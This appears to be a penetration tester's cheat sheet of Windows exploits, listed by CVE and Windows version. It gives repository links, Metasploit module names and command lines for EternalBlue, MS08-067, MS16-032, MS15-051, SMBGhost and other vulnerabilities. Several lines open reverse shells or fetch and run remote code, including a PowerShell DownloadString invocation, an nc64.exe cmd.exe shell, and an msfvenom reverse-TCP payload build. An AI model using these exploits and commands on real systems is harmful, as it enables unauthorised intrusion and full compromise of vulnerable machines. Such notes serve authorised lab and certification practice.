windows exploits

MS08-067 Exploit

• https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py

• https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067_w2k3_sp2.py

MS-17-010 EternalBlue Exploit

• msf:

  • checker: use auxiliary/scanner/smb/smb_ms17_010

  • exploit: use exploit/windows/sbm/ms17_010_eternalblue

• eternalblue_manual_exploit

  • no pipes needed | manual method

• helviojunior/MS17-010.git

  • update username as guest / anonymous (if needed)

  • python send_and_execute.py TARGET_IP SHELL.exe

• 3ndG4me/AutoBlue-MS17-010

  • ensure to run pre requisites

  • python zzz_exploit.py TARGET_IP

• exploit-db/42315

MS-16-032 Exploit

• EmpireProject/Invoke-MS16032.ps1

  • Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"

Windows 7

• MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86

  • abatchy17/MS11-046

• MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86

  • egre55/MS10-059:%20Chimichurri/Compiled

  • MS10-059.exe KALI_IP PORT

MS09-050 'srv2.sys' SMB Code Execution (Python)

• exploit-db/40280

MS09-002 Memory Corruption IE7 Exploit

• msf: use windows/browser/ms09_002_memory_corruption

Windows Server 2008 R2 SP1

• CVE-2018-8120

• Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

• SecWiki/CVE-2018-8120

Windows 7 SP1

• CVE-2018-8120

  • Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

  • SecWiki/CVE-2018-8120

Windows Server 2008 SP1

• CVE-2018-8120

  • Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

  • SecWiki/CVE-2018-8120

• MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86

  • egre55/MS10-059:%20Chimichurri/Compiled

  • MS10-059.exe KALI_IP PORT

Windows Server 2003

• MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86

  • egre55/MS10-059:%20Chimichurri/Compiled

  • MS10-059.exe KALI_IP PORT

Windows Server 2012 R2 Standard

• MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600

  • SecWiki/MS16-098

Windows Server 2008 R2

• MS15-05

  • SecWiki/MS15-051/MS15-051-KB3045171.zip

  • ms15-051.exe "nc64.exe -c cmd.exe IP PORT"

• MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86

  • egre55/MS10-059:%20Chimichurri/Compiled

  • MS10-059.exe KALI_IP PORT

Windows XP SP1

• Local PE using Windows Services (upnphost and SSDPSRV)

  • https://sohvaxus.github.io/content/winxp-sp1-privesc.html

CVE-2020-0796 | smbhghost

REQUIREMENTS:

• needs smb port:445 open

Steps:

1. danigargu/CVE-2020-0796

2. Generate shellcode using msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp

3. Update shellcode on line 204 file: exploit.cpp

4. Set TARGET_ARCH and set for RELEASE

5. Build solution

6. Run cve-2020-0796-local.exe